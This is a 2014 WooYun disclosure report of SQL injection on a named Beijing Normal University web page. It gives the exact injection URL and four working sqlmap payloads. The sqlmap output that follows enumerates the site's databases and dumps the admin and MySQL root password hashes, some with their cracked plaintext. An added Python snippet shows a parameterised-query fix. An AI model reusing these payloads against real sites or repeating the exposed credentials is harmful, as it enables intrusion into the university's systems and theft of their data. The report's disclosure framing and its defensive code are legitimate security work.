
Vulnerability summary

Defect ID: wooyun-2014-056627

Title: SQL injection vulnerability in the School of Systems Science, Beijing Normal University

Vendor: Beijing Normal University

Author: bitcoin

Submitted: 2014-04-11 11:02

Fix deadline: 2014-05-26 11:02

Public disclosure: 2014-05-26 11:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-04-11: Details sent to the vendor; awaiting vendor handling
2014-04-11: Vendor confirmed the issue; details disclosed to the vendor only
2014-04-21: Details disclosed to core white hats and experts in the relevant field
2014-05-01: Details disclosed to regular white hats
2014-05-11: Details disclosed to intern white hats
2014-05-26: Details disclosed to the public

Brief description:

The School of Systems Science at Beijing Normal University has a SQL injection vulnerability.

Detailed description:

Injection point:
http://sss.bnu.edu.cn/mainview.php?cid=1&id=16
The id parameter is not strictly filtered, which allows SQL injection. The scan output follows:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1&id=16 AND 7258=7258
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cid=1&id=16 AND (SELECT 9168 FROM(SELECT COUNT(*),CONCAT(0x7163676d71,(SELECT (CASE WHEN (9168=9168) THEN 1 ELSE 0 END)),0x716e646971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: cid=1&id=-6570 UNION ALL SELECT NULL,NULL,CONCAT(0x7163676d71,0x75644867466f68497153,0x716e646971),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=1&id=16 AND SLEEP(5)
---
[10:09:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[10:09:18] [INFO] fetching database names
[10:09:19] [INFO] the SQL query used returns 11 entries
[10:09:19] [INFO] retrieved: "information_schema"
[10:09:20] [INFO] retrieved: "23916593"
[10:09:20] [INFO] retrieved: "chnfontdb"
[10:09:21] [INFO] retrieved: "gallery3"
[10:09:21] [INFO] retrieved: "iesdbnew"
[10:09:21] [INFO] retrieved: "mpmdb"
[10:09:22] [INFO] retrieved: "mysql"
[10:09:22] [INFO] retrieved: "test"
[10:09:23] [INFO] retrieved: "ultrax"
[10:09:23] [INFO] retrieved: "wanfang"
[10:09:24] [INFO] retrieved: "wordpress"
available databases [11]:
[*] 23916593
[*] chnfontdb
[*] gallery3
[*] iesdbnew
[*] information_schema
[*] mpmdb
[*] mysql
[*] test
[*] ultrax
[*] wanfang
[*] wordpress
Database: mpmdb
[18 tables]
+---------------+
| admin |
| articles |
| articletype |
| cmstable |
| degreetable |
| nsftable |
| papertable |
| picnews |
| prjtable |
| projectcat |
| projecttable |
| stafftable |
| studenttable |
| titletable |
| treatisetable |
| tutortable |
| visitcount |
| xuanke |
+---------------+
Database: mpmdb
Table: admin
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| password | varchar(50) |
| r_id | int(11) |
| status | tinyint(4) |
| username | varchar(50) |
+----------+-------------+
Database: mpmdb
Table: admin
[1 entry]
+----------+-------------------------------------------+
| username | password |
+----------+-------------------------------------------+
| admin | 96e79218965eb72c92a549dd5a330112 (111111) |
+----------+-------------------------------------------+
Database: mysql
[23 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
Database: mysql
Table: user
[39 columns]
+-----------------------+-----------------------------------+
| Column | Type |
+-----------------------+-----------------------------------+
| User | char(16) |
| Alter_priv | enum('N','Y') |
| Alter_routine_priv | enum('N','Y') |
| Create_priv | enum('N','Y') |
| Create_routine_priv | enum('N','Y') |
| Create_tmp_table_priv | enum('N','Y') |
| Create_user_priv | enum('N','Y') |
| Create_view_priv | enum('N','Y') |
| Delete_priv | enum('N','Y') |
| Drop_priv | enum('N','Y') |
| Event_priv | enum('N','Y') |
| Execute_priv | enum('N','Y') |
| File_priv | enum('N','Y') |
| Grant_priv | enum('N','Y') |
| Host | char(60) |
| Index_priv | enum('N','Y') |
| Insert_priv | enum('N','Y') |
| Lock_tables_priv | enum('N','Y') |
| max_connections | int(11) unsigned |
| max_questions | int(11) unsigned |
| max_updates | int(11) unsigned |
| max_user_connections | int(11) unsigned |
| Password | char(41) |
| Process_priv | enum('N','Y') |
| References_priv | enum('N','Y') |
| Reload_priv | enum('N','Y') |
| Repl_client_priv | enum('N','Y') |
| Repl_slave_priv | enum('N','Y') |
| Select_priv | enum('N','Y') |
| Show_db_priv | enum('N','Y') |
| Show_view_priv | enum('N','Y') |
| Shutdown_priv | enum('N','Y') |
| ssl_cipher | blob |
| ssl_type | enum('','ANY','X509','SPECIFIED') |
| Super_priv | enum('N','Y') |
| Trigger_priv | enum('N','Y') |
| Update_priv | enum('N','Y') |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+-----------------------------------+
Database: mysql
Table: user
[6 entries]
+---------+----------------------------------------------------+
| User | Password |
+---------+----------------------------------------------------+
| <blank> | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| <blank> | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456) |
+---------+----------------------------------------------------+

Proof of vulnerability: the mpmdb.admin and mysql.user dumps shown in the detailed description above.


Fix:

Filter the input. Any gift for this one?
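The boolean-based blind payload above works because the id value is spliced into the query text, so "16 AND 7258=7258" and "16 AND 7258=7259" change the WHERE clause and produce different pages. The following is an added example, not code from the report or from the BNU site: a Python/sqlite3 stand-in for the mainview.php lookup (table and column names are constructed assumptions) that contrasts the concatenated query with the filtered and parameterised version that the fix section's "filter" amounts to.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the mpmdb content table; the real schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(15, 1, "article 15"), (16, 1, "article 16"), (17, 2, "article 17")])
    return conn

def vulnerable_lookup(conn, cid, id_):
    # Request parameters spliced straight into the SQL text: whatever follows
    # "16 " in the id value becomes part of the WHERE clause.
    sql = "SELECT title FROM articles WHERE cid = %s AND id = %s" % (cid, id_)
    return [row[0] for row in conn.execute(sql)]

def hardened_lookup(conn, cid, id_):
    # Step 1: allow-list the shape of each parameter (an integer id, nothing else).
    if not (re.fullmatch(r"\d{1,10}", cid) and re.fullmatch(r"\d{1,10}", id_)):
        raise ValueError("rejected: cid/id must be plain integers")
    # Step 2: bind the values; the driver never treats them as SQL syntax.
    sql = "SELECT title FROM articles WHERE cid = ? AND id = ?"
    return [row[0] for row in conn.execute(sql, (int(cid), int(id_)))]

def blind_oracle_differs(lookup):
    # True when the report's true/false payload pair yields distinguishable
    # responses, i.e. the lookup behaves as a boolean-based blind injection oracle.
    conn = make_db()
    try:
        truthy = lookup(conn, "1", "16 AND 7258=7258")
        falsy = lookup(conn, "1", "16 AND 7258=7259")
    except ValueError:
        return False  # the hardened path refuses both values before any query runs
    return truthy != falsy

def rejects(id_):
    # Does the hardened lookup refuse this id value outright?
    try:
        hardened_lookup(make_db(), "1", id_)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    print("vulnerable lookup is an oracle:", blind_oracle_differs(vulnerable_lookup))  # True
    print("hardened lookup is an oracle:", blind_oracle_differs(hardened_lookup))      # False
```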

Copyright notice: credit the source when reposting: bitcoin@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2014-04-11 11:35

Vendor reply:

Beijing Normal University has been notified to handle it.

Latest status:

None yet